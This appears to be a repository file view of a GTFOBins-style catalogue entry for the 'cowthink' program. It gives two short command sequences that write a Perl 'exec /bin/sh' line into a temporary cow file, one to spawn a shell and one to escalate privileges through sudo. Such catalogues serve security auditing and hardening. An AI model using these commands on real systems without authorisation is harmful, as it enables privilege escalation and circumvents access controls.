You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

15 lines
307 B
JSON

---
description: It allows to execute Perl code, other functions may apply.
functions:
shell:
- code: |
TF=$(mktemp)
echo 'exec "/bin/sh";' >$TF
cowthink -f $TF x
sudo:
- code: |
TF=$(mktemp)
echo 'exec "/bin/sh";' >$TF
sudo cowthink -f $TF x
---